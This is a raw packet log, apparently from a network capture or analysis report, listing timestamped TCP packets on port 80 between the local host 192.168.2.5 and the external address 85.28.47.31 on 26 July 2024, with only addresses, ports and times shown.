Jul 26, 2024 20:09:04.664901972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664902925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664918900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664922953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664935112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664942026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664949894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.664980888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.664998055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.665812016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665827990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665842056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665857077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665862083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.665870905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665885925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665893078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.665900946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.665913105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.665931940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.665960073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.666760921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.666779041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.666793108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.666820049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.666845083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668181896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668198109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668210983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668226004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668241024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668242931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668255091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668270111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668275118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668292999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668301105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668308020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668323040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668328047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668338060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668351889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668358088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668369055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668382883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668395042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668395042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668397903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.668421030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.668456078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669238091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669253111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669266939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669287920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669289112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669305086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669316053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669320107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669334888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669339895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669358969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669385910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669881105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669897079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669909954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669925928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669929981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669939995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669955969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.669959068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.669984102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670047045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670768023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670783997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670798063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670813084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670826912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670829058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670841932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670849085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670855999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670871973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.670876026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670895100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.670911074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.671684980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671700954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671715021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671729088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671744108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671758890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.671761990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.671777010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.671796083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.672504902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672521114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672534943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672549963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672550917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.672581911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.672605991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.672856092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672913074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.672951937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672967911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672981977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.672996998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.673001051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.673012018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.673019886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.673027039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.673042059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.673053026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.673073053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.673090935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.675617933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.675632954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.675647974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.675662994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.675682068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.675707102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.676203012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.676218987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.676234007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.676251888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.676280975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.676665068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.676681042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.676712990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.676740885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.678544044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.678606987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.679053068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.679110050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.680007935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.680023909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.680037022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.680058002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.680075884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.691864014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.691936970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.691946030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.691962004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.691993952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.692019939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.693192005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.693206072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.693221092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.693234921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.693239927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.693260908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.693288088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.712658882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.712673903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.712691069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.712706089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.712742090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.712773085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.712959051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.712974072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713007927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713018894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713032007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713035107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713051081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713054895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713066101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713074923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713083029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.713093996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713112116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.713128090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.742186069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.742212057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.742228985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.742270947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.742280006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.753868103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.753964901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.753971100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.753983021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754019022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754046917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754209995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754226923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754242897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754259109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754259109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754281044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754306078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754309893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.754700899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754715919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754724026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754738092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754751921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754767895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754829884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.754837990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.755053997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.758455038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758471966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758486032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758500099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758514881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758522987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.758528948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758543968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758549929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.758559942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758574963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.758594990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.758609056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.758639097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759382963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759399891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759413958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759429932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759449959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759462118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759464979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759478092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759493113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759495974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759507895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759522915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.759533882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759553909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759573936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.759999037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760015011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760029078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760044098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760051012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.760059118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760075092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760072947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.760090113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760097027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.760106087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760116100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.760122061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.760149002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.760171890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761703968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761719942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761734009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761748075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761754990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761763096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761776924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761779070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761794090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761810064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761816025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761825085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.761835098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761857986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.761883020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762197971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762223959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762238979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762254000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762258053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762270927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762276888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762285948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762296915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762301922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762315989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762321949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762331009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.762336969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762360096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.762377977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763155937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763173103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763186932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763201952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763201952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763217926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763225079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763232946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763247967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763250113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763262033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763268948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763277054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.763300896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.763324022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.764245987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764261007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764276028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764291048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764293909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.764306068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764322042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764323950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.764337063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764348984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.764353991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.764369011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.764398098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765268087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765285015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765300035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765314102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765315056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765331030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765346050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765346050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765360117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765374899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765372992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765388966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765393972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765403032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.765428066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.765455961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.776473045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776510000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776530027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776612043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776628017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776644945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776649952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.776663065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.776693106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.776721954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.776721954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.796889067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.796987057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797003984 CEST	80	49704	85.28.47.31	192.168.2.5
